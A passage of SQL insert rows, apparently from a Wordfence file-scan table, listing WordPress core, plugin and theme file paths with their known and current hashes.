(0xcb2181a223f2b0d5497c1b8f82db46e9, 'wp-includes/js/tinymce/plugins/directionality/plugin.js', 1, 0x00000000000000000000000000000000, 0x2601d622e85809262029c6cf3dca8024, 0xb5268b5bec40e0ca3588b928d308ac637691a7024cfb8d594936f0423b29062d, '', 0, '?'),
(0xcb21c5d05649849c386ea4ad3df275c6, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_extension_24px.svg', 0, 0x8d6539925daa2ff600fe5d504cf5b32b, 0x8d6539925daa2ff600fe5d504cf5b32b, 0x9012adb517cc1d73a5637d5a054534eaaf3e71a7a5ad972a9b5d65cfb0017cbe, '', 0, '?'),
(0xcb2fa63c8b8eb24a912009d4db898359, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/scissors.svg', 0, 0x51ddab6de64a7451957b93b47a7edcb4, 0x51ddab6de64a7451957b93b47a7edcb4, 0xc5a431ff9964df0406bd7dceeafe95a2c3856773768baececfa386c87aab2c06, '', 0, '?'),
(0xcb3556019b78c72c24be3e3764fd6bbb, 'wp-includes/sodium_compat/namespaced/Core/X25519.php', 1, 0x00000000000000000000000000000000, 0x0405dab862faf2af1039f41bb087b14d, 0xe946a92f271ca18d804d259439f4a07d40acce6657a33e8c960c15532aad156d, '', 0, '?'),
(0xcb35c6c2c94d25bc5c4bc575f6a92f4a, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_event_note_24px.svg', 0, 0xb2f5eb80011cf68822668e4f4658e9d5, 0xb2f5eb80011cf68822668e4f4658e9d5, 0x392d5a5ddba86de732084543eb634b4fa3b6992a88a1a2144ba1423aa29353f5, '', 0, '?'),
(0xcb36a03ca5ca43eaefaebfb9563a2872, 'wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js', 1, 0x00000000000000000000000000000000, 0x7c46e095db079326a9bf66aa5a05f8a4, 0x33c0c2f57f9af4e27ef09be9ae964408fa155a49e51298c10983d2d141a1728c, '', 0, '?'),
(0xcb3d590ffadceed2d2304b7f04fa3fe4, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sms_failed_24px.svg', 0, 0x3fd399604519431809a090a52d2cea70, 0x3fd399604519431809a090a52d2cea70, 0x6333080d1606106d1670690932f05338147face23b68c8de096dc9107f7afa12, '', 0, '?'),
(0xcb553cdd3f592cf5cf1381a7d8bb2810, 'wp-admin/js/svg-painter.min.js', 1, 0x00000000000000000000000000000000, 0x000daef8be797700bf57756a191f0097, 0x6b3451d4df1d5841d8db6b9e69217090118d7a1c19fed29c851d61a37961dd31, '', 0, '?'),
(0xcb5947a59dd50f32627072ac5e816d48, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_brightness_medium_24px.svg', 0, 0x54423079d379a0b2d1484cca2759f77b, 0x54423079d379a0b2d1484cca2759f77b, 0xf095b785619be3720ed0d3e2faf1392e15ba260f25c4002b3efaaafca99ce1e1, '', 0, '?'),
(0xcb75aa72443e06b9a4319c5353fd8658, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_statusbar_connected_no_internet_4_26x24px.svg', 0, 0x34b49af32c87ff8f59d66e54b67812d7, 0x34b49af32c87ff8f59d66e54b67812d7, 0x96e2df857a0aedee63ff2c226461c1cd711c2150f7fb04d7f233c468a5b59d72, '', 0, '?'),
(0xcb790fd01f3691366c0ceb9a4dac43b7, 'wp-content/plugins/wordfence/views/waf/firewall-status.php', 1, 0x00000000000000000000000000000000, 0xb46c7700693735c4f18ae6830647f493, 0x2757b1d6b544ed72ff4442b7edc165480afcea40fd85c5223a3d214d0b2366c4, '', 0, '?'),
(0xcb7d556126676cc3e469b829baebc221, 'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php', 1, 0x00000000000000000000000000000000, 0xe31df052d058e092d8b53f6b01e8c91c, 0x2b113a19abdb31b15a8b1460b90e1876ae06952f9408632c46c938d9e764b235, '', 0, '?'),
(0xcb8b095571acddbf1545148d7293a9ff, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_6_24px.svg', 0, 0x160c8d2d00e09c39bd152e61fc39707b, 0x160c8d2d00e09c39bd152e61fc39707b, 0x49cf91bab61f55f501c0ae641f39d2b3bd35bbc6ec0e0a166a4f768be71d1100, '', 0, '?'),
(0xcb8da54e912eb541f33612420898d27c, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_dialpad_24px.svg', 0, 0xa8a2cf1393a9099aa0e748c19c5d1516, 0xa8a2cf1393a9099aa0e748c19c5d1516, 0x838c99076717cfd9c51ae948a61c4d3929b864bdc358ae9be6e44bede47de178, '', 0, '?'),
(0xcb8de547e4af806f1b65b7ffef6f9c1c, 'wp-includes/js/shortcode.js', 1, 0x00000000000000000000000000000000, 0xe97bf5b755c0c98bc63ed715b7fb3ff9, 0x9fb5df82fc8cbd52dfaaae8565a0973664b4cca62fe5db9b217574fee552d7f1, '', 0, '?'),
(0xcba4d490927b25106bf2a58e23b666db, 'wp-includes/js/mediaelement/wp-playlist.min.js', 1, 0x00000000000000000000000000000000, 0xace20386f3337c475ee213634b5422db, 0x27e86522ca8c805f286e8c7fc966faed7777e089a81a199f4e14aa32ef2b201c, '', 0, '?'),
(0xcba9ff3965225f4e373374787293860d, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_note_add_24px.svg', 0, 0x13599628456b8c6a6a6a04221e1b6107, 0x13599628456b8c6a6a6a04221e1b6107, 0x5a088f05214d57b04756862b75db72892d20c0b7d247e583ff61779dc914b3da, '', 0, '?'),
(0xcbc79d86dc5181bd5f799c64f69d2ba3, 'wp-includes/sodium_compat/src/Core/XChaCha20.php', 1, 0x00000000000000000000000000000000, 0x5886f18d5520695530c66c6c391bfd63, 0x8dfe5fd27624141fedb855375f912a0d3fac2b1f0ff35ef78ce289be01bec480, '', 0, '?'),
(0xcbd39665d7214cddb90b0099b94ea20c, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_signal_wifi_off_24px.svg', 0, 0xcfe77da8c54eb8b0750e7a7d08b89866, 0xcfe77da8c54eb8b0750e7a7d08b89866, 0x189b9d3e8cd079451a6b4601ac7eb6f2ce3efc232f5d87cca7b1fa3ab8c7149a, '', 0, '?'),
(0xcbef1d76ed452cbf2d4fe47bcf01ba96, 'wp-includes/link-template.php', 1, 0x00000000000000000000000000000000, 0xdf1b047ffda321b83106fa83feea5ed4, 0xe354f399f53397de2cc46c408cb1c70cb44421d64c2af3565cb4dce58dd91e6a, '', 0, '?'),
(0xcc0624b9661b1aab0b2b259772c94872, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-wordpress.svg', 0, 0x87d2fdfba6af5f23a3f30237aa13dd63, 0x87d2fdfba6af5f23a3f30237aa13dd63, 0x9af5821823d34a60d58fc1c12e798061b951b9dff5a65e9d4d153f8988fdb827, '', 0, '?'),
(0xcc217fe94c54e133959f69d9ea781bc5, 'wp-admin/update-core.php', 1, 0x00000000000000000000000000000000, 0x9eef8c67fd75a3441e1be9a825908435, 0xffa202036d6b630952d048c363c10ba2c3ecade74f6018438357f468227498e2, '', 0, '?'),
(0xcc2ff1bead33a5569cd18d17ca372042, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_wb_iridescent_24px.svg', 0, 0xdf1710cbaebe25effe74f1f0ec1b9b25, 0xdf1710cbaebe25effe74f1f0ec1b9b25, 0x124f511088545f66abe91ff99e8a389c91bfa8bbb93a34ca8cdb4f48c7d13f32, '', 0, '?'),
(0xcc310925678b61f8789d7d44a823097f, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/alert.min.js', 0, 0xb65c63a29efd8d2c7f5750dbcf446907, 0xb65c63a29efd8d2c7f5750dbcf446907, 0xa65fca6cf2dea48a5e4803f6856c1b1aa4efe8565d8af2896512e927bdec078f, '', 0, '?'),
(0xcc3c821b5086224a5648ccc5810118ec, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_ColorPicker.php', 0, 0xfc025457cba33939f93f3141bdc31f4b, 0xfc025457cba33939f93f3141bdc31f4b, 0x4ea611f6466db9a89608c388092f25e8db70db9ec5bb7d2ac3752ee3e808fd81, '', 0, '?'),
(0xcc4dcf5471265b3ffdf93eecb98ae50a, 'wp-admin/css/colors/ectoplasm/colors.scss', 1, 0x00000000000000000000000000000000, 0x940171d1392bd8071122a905d12b9195, 0x42c1866d8d7f1ee64e91be6802c4eb17a0b5ac73744ea3f36a07415334580024, '', 0, '?'),
(0xcc4de8d67febe07adfc5ad59ba1efcae, 'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png', 1, 0x00000000000000000000000000000000, 0xd80747d34afb87753b51d45a36f8bd17, 0xfffb8506df5c4d55198ced4b6851af77c043a903b669d656b4eea2b9b2ce4a27, '', 0, '?'),
(0xcc568ddaae999cc612ea4dafe96ad381, 'wp-includes/js/plupload/license.txt', 1, 0x00000000000000000000000000000000, 0x751419260aa954499f7abaabaa882bbe, 0xbcff007631a3ea73d41d4eed3e63491f4412d9a6be9dd60f8449e9ad30ff1d2d, '', 0, '?'),
(0xcc7fd1fba0699bef6eb06a2fc472bcd5, 'wp-includes/js/dist/i18n.min.js', 1, 0x00000000000000000000000000000000, 0x34c000e943a288c66c0abb5d159c0b4b, 0xd8b32ef159edf1b6cd9bcac273f273d5f0a9e1332a69ff1a01fe5f31be0d4000, '', 0, '?'),
(0xcc8b90b871c842103361ea59efe72df6, 'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php', 1, 0x00000000000000000000000000000000, 0x36233e7b7a71b8db0a5325bdf8a8a14d, 0x13708016fd131f521e4101f637b6eda95a51fe6ac643704e6116d93dbcf94dd1, '', 0, '?'),
(0xcc997efcc88cc3ae2b9de4ed6279c881, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php', 1, 0x00000000000000000000000000000000, 0x107ba5ec888a7ac01fc13b3521cb05d0, 0xf244d01a8a8eec4c89dea0ce9461a414b05d036ef49c0abbec8cd54c26e60a1b, '', 0, '?'),
(0xccab09752b1dc4a5ef00a2fbcc242953, 'wp-content/plugins/js_composer/include/classes/shortcodes/layerslider-vc.php', 0, 0xf71e6f09fa84f2d3d31ed3581525c9dd, 0xf71e6f09fa84f2d3d31ed3581525c9dd, 0x97331ad3e7fbb8f58e6fa1749b08f2380e9e1741401d0cbcc04657c044135a8f, '', 0, '?'),
(0xccb34c0aa626403c7fe00d3811d32152, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/containers/vc_column_inner.js', 0, 0x142940ee6e306d929da22195d2f4586b, 0x142940ee6e306d929da22195d2f4586b, 0xa1b5d031b8de5bccea29f137bbc50e8306191feda13bbb1ba9d2f98281134f6e, '', 0, '?'),
(0xccc38a356666cd3b2c472127f6f3272d, 'wp-admin/css/colors/ocean/colors.css', 1, 0x00000000000000000000000000000000, 0x4290f926950485af972020a1c2e17bdd, 0xcf09f5c4008485add8160263e4144ad70dd70ecefcb25d351b1a74fffe2c3efa, '', 0, '?'),
(0xccc5ceead5223b2bc20d7875b4e4ca77, 'wp-includes/js/mediaelement/renderers/vimeo.js', 1, 0x00000000000000000000000000000000, 0x4ed19dc7687386bb9c6c172dac61f4c4, 0xafd9569a25a3bc79342136e1916eece5e0351ba3d8067327548af11b12590513, '', 0, '?'),
(0xccc78ab745c17696632ceed8b579535e, 'wp-includes/images/crystal/license.txt', 1, 0x00000000000000000000000000000000, 0xf05db54c63e36918479b6651930dcfe7, 0x76e8da706d84ca0163ebf836df597e222c2156b9d845586cfc05146ce3227ade, '', 0, '?'),
(0xccd493f7b45b5f3da6b4ee5ad0b264a7, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_modals.php', 0, 0xe76ed39f1c55f187481cd64e72663854, 0xe76ed39f1c55f187481cd64e72663854, 0x6a08037d418031737203f53ea133e863a7b235969ba18c16395e117ee8c236db, '', 0, '?'),
(0xcd0fa9ffe1877011f76ad69b6092c877, 'wp-admin/css/customize-controls-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xad52cf5c1455ee32967bfcbef32f0900, 0xf71b37b30f99ba0fc7fc67df31a6785f77028040b1b96489043cc66ef2ee482f, '', 0, '?'),
(0xcd153550b3efc865f88789eb4e36616d, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/vc_wp_custommenu.php', 0, 0xe1125b44ac3c4ddd96ae40e35a741536, 0xe1125b44ac3c4ddd96ae40e35a741536, 0x6a80307a7470523a0eb609c0fbf601ad82358cd2d1733f7120918e4112d9af06, '', 0, '?'),
(0xcd1e64ddeae36c50914fea92f9490484, 'wp-admin/network.php', 1, 0x00000000000000000000000000000000, 0x2eb8b036bd098494a0f1f2086d665309, 0xde5538fdd0daf73dd540109a150697cb51021c4b25922ae5c7412089ae176582, '', 0, '?'),
(0xcd22ebc8bf0cf2000ba7979c80d67879, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_swap_vertical_circle_24px.svg', 0, 0x41e1f240141ac71336ad47e8d043444a, 0x41e1f240141ac71336ad47e8d043444a, 0x832745fc7bd282fb3345d82c2e7a80974e812d09cea302fe6c116e05648cfa4c, '', 0, '?'),
(0xcd26c1c305267bf8c43a2f293a355211, 'wp-content/plugins/js_composer/assets/lib/bower/masonry/dist/masonry.pkgd.min.js', 0, 0xea6a6f7b0865ff3dcbba7e2af45adf81, 0xea6a6f7b0865ff3dcbba7e2af45adf81, 0x2fbc52e20a5566d76aae9cc03129836131d22771a4624afe038fb519b20ad9cc, '', 0, '?'),
(0xcd29c4c503e4f2009f65875fd4353dab, 'wp-content/plugins/wordfence/lib/diffResult.php', 1, 0x00000000000000000000000000000000, 0x30e7f5b115150b83774a97c7d3116eb3, 0x5f19d1e05ead8f3eeeecb2384ccb1bb9f3c0a55ce1ea9b1f82f284867b50e6d3, '', 0, '?'),
(0xcd2ddd80b3592563eca79e21a7e949e9, 'wp-content/themes/Impreza/framework/templates/elements/post_image.php', 0, 0xf06b94ff403f846e17d4e6611ada5415, 0xf06b94ff403f846e17d4e6611ada5415, 0x3bbe9afe66cfcca514a9549d4c88fc0961b5d1576a9d778e02b45240788a83b5, '', 0, '?'),
(0xcd39f02a05d21b807dfd7e6fcc5c5618, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/file08.svg', 0, 0xb7e1736062538543c4d2d9617d669380, 0xb7e1736062538543c4d2d9617d669380, 0x16f6466e263888a11c8aeb1c8dc42bd7170a6a429c833fbed18cdce299ae5f8b, '', 0, '?'),
(0xcd3a3863bd60f60696ffde4c7b1926a5, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_queue_play_next_24px.svg', 0, 0x6eec674db6036d444d01d84a2351ac09, 0x6eec674db6036d444d01d84a2351ac09, 0x7a4aeeec59f027a9965d9b84c129a1105b4e920dd879216d0edf4633ef6fb7db, '', 0, '?'),
(0xcd49582e56b6ab0de2d395a0c35245b8, 'wp-content/themes/Impreza/author.php', 0, 0xf146fc60eb9dcd245c2f997572763a6a, 0xf146fc60eb9dcd245c2f997572763a6a, 0x26dd6b0bb4bfaa3116ad05d96d06d1b9c12b6fd295cd75326fd91cb608a5d574, '', 0, '?'),
(0xcd49846c61f703d5cf30312e4bdd92a0, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style03.php', 0, 0x5e5a7b33cdd66982fa40d011d77cc4e1, 0x5e5a7b33cdd66982fa40d011d77cc4e1, 0x2af9f89729aba04c02b9409f5379aca90f2f1c9caf51fcfa6ed5121316ff0596, '', 0, '?'),
(0xcd4b083dad5808ec610c3ac427351dbc, 'wp-includes/sodium_compat/src/Crypto.php', 1, 0x00000000000000000000000000000000, 0x811c2d70fc98ff820045c863629c63a5, 0x22dacc989f4c8e18d7d921d27b0372446e507a5ef4041fda58f26af4c4fb4c6b, '', 0, '?'),
(0xcd5e1d2691f36052e179928b1899ec4a, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php', 1, 0x00000000000000000000000000000000, 0xd47905e18e7dcfcaef1e4af26b803ea6, 0xff1db994dbc5c72f194fe6eb0f09ed89c2b96ba4627aeb135f10a31708425d55, '', 0, '?'),
(0xcd6d8d13a5024c304e22c8547eec62dc, 'wp-includes/theme-compat/footer-embed.php', 1, 0x00000000000000000000000000000000, 0x16841cf55adc04ab84f22e932b96196a, 0x83691da7c944ff414af6cf883b76172c671763cc1118250891e788d1095e1923, '', 0, '?'),
(0xcd77ff393d9f5f0c220768251792d776, 'wp-admin/css/install-rtl.css', 1, 0x00000000000000000000000000000000, 0xde4f642413c45617556688cb66f92878, 0x56ba9d378fb403c212f17b1c35612431e788c7a8c362a236d1e5edf45f87dc44, '', 0, '?'),
(0xcd8e33d7a2e04a796ecefec4804d07e0, 'wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff', 1, 0x00000000000000000000000000000000, 0xfee66e712a8a08eef5805a46892932ad, 0xe1fc2634220d519d6a580ce36d4e22e3c93f50be6f94cd5cb0c6f53f07b9f98c, '', 0, '?'),
(0xcd93df59e13336bee96ce7805918abb0, 'wp-includes/js/tinymce/plugins/textcolor/plugin.min.js', 1, 0x00000000000000000000000000000000, 0xc4dc76993c68e4e4e8f0ceeeff70fc0b, 0x21c02fcc5b49e42b0da9f047edb2e2e011962044d5adcf37803d8e8eb7ae9327, '', 0, '?'),
(0xcdaa75b96f77734643b9475b6383efab, 'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php', 1, 0x00000000000000000000000000000000, 0x45bdb0df82d149418e443db8b5eadda0, 0xeea4fa51c7517f5e387aca9d1ef32656f24ac4e8af8301be3b6708de22e37ff1, '', 0, '?'),
(0xcdb32970119a2d82336958b42ebb4570, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_album_24px.svg', 0, 0x695626486c531d8f3e3b1ec4b0e5077d, 0x695626486c531d8f3e3b1ec4b0e5077d, 0x73e9c148e1ac78867b24d474d3cdfca7a9b8f27487c760b18f059321db3066df, '', 0, '?'),
(0xcdb613946aca83e0b0b118fdffb72da6, 'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php', 1, 0x00000000000000000000000000000000, 0xc5fe06ecfbbf68f6e33b42fe1592443a, 0x1a838dd5d2ecb9f84082b1dd5cab9bc9940d71422c434bcf8477e52ead171e7a, '', 0, '?'),
(0xcdbd33c2e8813da3a14fc147c47c7ea7, 'wp-includes/SimplePie/Credit.php', 1, 0x00000000000000000000000000000000, 0x0385e4a14de78c8b2a167f3e0aea197c, 0x18a9844e33efef1cfd24e3105a832c21f0c70f3cedf1eb1cb0822139ee22dd12, '', 0, '?'),
(0xcdcaa50e9823b41d8d12bd3df2fbc020, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/tooltip.min.js', 0, 0x052d5bd120d74fc3b798251391d72e11, 0x052d5bd120d74fc3b798251391d72e11, 0x49d3ec124108791d869a2b8fce59d3c3a9600b44f6f019e20de222a50a244e29, '', 0, '?'),
(0xcde733c0cdcd0182e41946f43cb6a138, 'wp-includes/js/underscore.js', 1, 0x00000000000000000000000000000000, 0xf893e294cde60c2462cb19b35aac431b, 0x8f3841d832e9787abec2003c472d08874509e602b072db10efec87ae3fac529b, '', 0, '?'),
(0xcded53bb023e73bb552980b9a415cd48, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php', 1, 0x00000000000000000000000000000000, 0xb079248f4e0358d21b9fee6c80b16c13, 0x5bec8e2da9b9c276353cdbe54d0ae11f1fa6cb2b42bb75022e162cd43515671c, '', 0, '?'),
(0xcdf889bb6a2867f91f807e6a5523b7d6, 'wp-admin/includes/class-wp-filesystem-ssh2.php', 1, 0x00000000000000000000000000000000, 0x8bba24adb00c1b13c4a3cdaf52611554, 0x04aec0ad6ef65374341e7a04aa5c0681bf7f4657f2474b49a9484cbff7ce3080, '', 0, '?'),
(0xce184fd1429ab2f1b761e64f49b715bc, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_tag_faces_24px.svg', 0, 0x6c2171034d2be778f1206b1d2d8be803, 0x6c2171034d2be778f1206b1d2d8be803, 0x001d11eaa7a45e76de95154fe79bcecd8df08a9672fc9772a09c302389d5fb74, '', 0, '?'),
(0xce31344a063ce26ff16b58f7d46a90e3, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/Pe-icon-7-stroke.svg', 0, 0xdedf26989fdd78c33cb9ae664a604d6c, 0xdedf26989fdd78c33cb9ae664a604d6c, 0xe4b2376ff0bdc808cfb2e29e60770c01bc21b1983d464a205da8d2aed2c2b29e, '', 0, '?'),
(0xce373a7bad7eaa441a96615fbd5ae720, 'wp-content/plugins/revslider/admin/assets/imports/flickr-gallery/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xce53eb7004cd9d5cea50ec41416d9f62, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-header.tpl.php', 0, 0xd51030fa71c2ba1d3adc4dc97e5a3d6d, 0xd51030fa71c2ba1d3adc4dc97e5a3d6d, 0x40b39e7419367aa455e3f4dea0dfabf82a75adab5b99276b55530ba34636f32c, '', 0, '?'),
(0xce59b58d15662ff7707799cd0e8c7fa7, 'wp-includes/Requests/Response.php', 1, 0x00000000000000000000000000000000, 0x11ce7086bbb7ae52e6abb7c4fd270b47, 0xaef5f9c41b5777594b4c0ac5ec092d2afd01111be8c9155e652265c6285f2c67, '', 0, '?'),
(0xce5f292daa5d13edcb8c6b4f09c3f7c3, 'wp-includes/ID3/module.tag.apetag.php', 1, 0x00000000000000000000000000000000, 0x860cc9fa69a2d27419829be62d25ddd1, 0x1fe0201230ab63c21284d0da88ca01642239afb15f6d5affd962f3c1acd79514, '', 0, '?'),
(0xce6c2f1d3cc0cd55e7eb5a410e078be5, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php', 1, 0x00000000000000000000000000000000, 0x9dcda372a196a1ace90ce1ef5ace77fb, 0x239f8095b6e9c04a05e93c4c361d1993897a71e94eca30e58ccbe266385af3a3, '', 0, '?'),
(0xce7c3abd881f22a1d27db62709eff062, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_close_24px.svg', 0, 0xaddfce46ee90a4cc5f8d1aa464ab9822, 0xaddfce46ee90a4cc5f8d1aa464ab9822, 0x4dfe728703593574c1d9114aaca0ce241559bc4920c53f82ecbec0ece0955ee2, '', 0, '?'),
(0xce7c9ecf1566f780eee8c92c32ad5409, 'wp-admin/term.php', 1, 0x00000000000000000000000000000000, 0x9883c8549eca1122042371d38d00cc17, 0x28dca982317b78d898e5ce0174f557ce25971feaa2ae8c1d90dbf3fed32577df, '', 0, '?'),
(0xce7e99cf0245c94479c36eee59330c72, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_line_spacing_24px.svg', 0, 0xd97347ea7b1aa747c5bc87e4cf3aef08, 0xd97347ea7b1aa747c5bc87e4cf3aef08, 0x2e73dd03d837ed7904dc127b06bb9677bfcb9415eab5060813fa8c06cc055577, '', 0, '?'),
(0xce809841abc215b22027075aefbd1308, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/ace.js', 0, 0x3d297cc42328c4067c8d4e90ac5277b0, 0x3d297cc42328c4067c8d4e90ac5277b0, 0x9e4079457e4303643eb598f92930dd813365e8d9556d0d6fa1c33910944989e1, '', 0, '?'),
(0xce8c3bdb15475b210212332c1cbb65c2, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/jparallax.js', 0, 0xb945fd12554bec41395524e30d21bb9e, 0xb945fd12554bec41395524e30d21bb9e, 0x278c7d089ed950dac604fe9d3149b2a722d361f9bf4208dfdaea7374553ebc56, '', 0, '?'),
(0xce9227666f3efa1c3270799d4333a91a, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_phonelink_erase_24px.svg', 0, 0xef75460ba19bd4005951578cd5749d13, 0xef75460ba19bd4005951578cd5749d13, 0xcc3917f0d8a228638552d8b89c9ca599ffffb73c1b81607e56fada6597e877a5, '', 0, '?'),
(0xce9d0b507cd9da92fc879ef35c0bc36f, 'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php', 1, 0x00000000000000000000000000000000, 0x88208477045ee3ae0fb3195de7b7a34d, 0x95abf2b0c1f1f7a75a45fc4f1d15ebb43728ad6e7f599bee0f68ee07cba88387, '', 0, '?'),
(0xcec09c5a69ca0f27cf568def35e0a393, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-settings-map.php', 1, 0x00000000000000000000000000000000, 0x881eb6dafd253bcd1d63f796d96aaf97, 0x84cba4ba6084ab48c4169a27899f0ce484fbd2dc652bdd516e98df808e92e306, '', 0, '?'),
(0xcec593fefafacf94f2031f3d9fba2336, 'wp-admin/images/post-formats32.png', 1, 0x00000000000000000000000000000000, 0x57597e8f4f92f87bf02b5f4c896b453b, 0x6bbe3c3814a42e5f44b4e34b0e188b82b5df475ba735652d49283077b0e16807, '', 0, '?'),
(0xceec4647c59ced41cafb3fcd4b164dd6, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/rocket2.svg', 0, 0x7cc23bea2ef5e86cd27738a47dc0fedd, 0x7cc23bea2ef5e86cd27738a47dc0fedd, 0xbd63ff9d4bd13f58623f740b46a2344f2b5d756633ef9d6127250b262f8ef29c, '', 0, '?'),
(0xcefcf48d2d08dbda7b0d6fd5a91534e4, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_logos.php', 0, 0x06db229c6cfe74a5b68373f54c349ab6, 0x06db229c6cfe74a5b68373f54c349ab6, 0xf5b4d734067f23c243852c794be31842544d5b9dc1c2b5299a54e4a10d2a4822, '', 0, '?'),
(0xcf02df132c949f11b440ced6f3ba51cc, 'wp-content/plugins/wordfence/views/common/indeterminate-progress.php', 1, 0x00000000000000000000000000000000, 0x49b7e622dd7367bd7f1734885c28b138, 0xb440991beefd5a6e22cebe7e9e51d594bac338169373e3508ab69e0037e50533, '', 0, '?'),
(0xcf129fd8677734efe41d4c52a8aa5710, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-title.svg', 0, 0xb5d7f47d4ecebb0001a7d4b23ecae5ed, 0xb5d7f47d4ecebb0001a7d4b23ecae5ed, 0x9b4ba92ce7da1b7d3066b3603ff4ad1594f491550e33b831135f54480312b0e4, '', 0, '?'),
(0xcf2dd32b8e65c6e1d46df17522b6c378, 'wp-admin/css/colors/sunrise/colors.min.css', 1, 0x00000000000000000000000000000000, 0x77b44680773c336a5659fc5a9c9fde6f, 0x749a8b512747daa53a3b1d63082e81a09312a091ee22b482b100c85c57701a5d, '', 0, '?'),
(0xcf4b169b088d1fb35873533ed9face64, 'wp-content/plugins/revslider/public/assets/fonts/pe-icon-7-stroke/fonts/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xcf51814bfdd6c451063935188ec69460, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php', 1, 0x00000000000000000000000000000000, 0x01ec038be43ed9ca59215c7a9bff4a58, 0xbe14b3422a794ccbb010838161d8e275a82274a01a34e0fec75adbb34e6bc2a5, '', 0, '?'),
(0xcf6378803eb5db6ab2da6895c9495605, 'wp-content/plugins/revslider/includes/template.class.php', 0, 0x0f0f875dbba16caa62a9ed8c68e6cb35, 0x0f0f875dbba16caa62a9ed8c68e6cb35, 0xc235005ec6b7a067a14f12704b9cddde101d29bf655ee3e766886f720767c1c1, '', 0, '?'),
(0xcf67942495b02e0648a07107ce555011, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/umbrella.svg', 0, 0x24ac947cbc39d105db8ff5318e4d6ba4, 0x24ac947cbc39d105db8ff5318e4d6ba4, 0x700916a08b60af791e740d29de64ff37f9560a63cd15f84780bb91e867a6d026, '', 0, '?'),
(0xcf7546f3e2915e47faa545082b88b663, 'wp-admin/network/freedoms.php', 1, 0x00000000000000000000000000000000, 0xe1af39e94239a944440ab2925393ae60, 0xcad34a4227de98988146528e462f31e7ad073741d9fb007926e1a30f83c8f2b3, '', 0, '?'),
(0xcf7e6a25e4bd02e0e706a3b88d951be2, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/index.php', 0, 0xfe715bdf46d754d83d7de5c67b944a37, 0xfe715bdf46d754d83d7de5c67b944a37, 0xeb3af5ea9ee14f0127e2dd719b88c2ecd202e700f255c854537bf0fdb6ce8e90, '', 0, '?'),
(0xcf808d7418471dc8a99d04c8c08ba444, 'wp-includes/js/tinymce/plugins/image/plugin.js', 1, 0x00000000000000000000000000000000, 0x8a42170c8d0a801b34d85caab530f03d, 0x511eb876f6a99353493e3b34be8e3110fb25bb7266ef2440cf70d4d8f8115c6a, '', 0, '?'),
(0xcf8a153df7c658aeacf762427a27208c, 'wp-includes/js/jquery/ui/effect-explode.min.js', 1, 0x00000000000000000000000000000000, 0x2f68b680e67f09ced628d98b2bb456ff, 0xe79ab4f1f6952465e6c65d147e84ea4c8b1c54d3dca555acff30a9ae941660a1, '', 0, '?'),
(0xcf9a96229eb289056af079b1d4cddd5e, 'wp-includes/js/dist/blob.js', 1, 0x00000000000000000000000000000000, 0x58bfb37a8081b4eda6e024b135919aa3, 0x572d11e5b3d6766925421fd34f61406c3d89c745ed82c1e5ddd4402ec40bd1bc, '', 0, '?'),
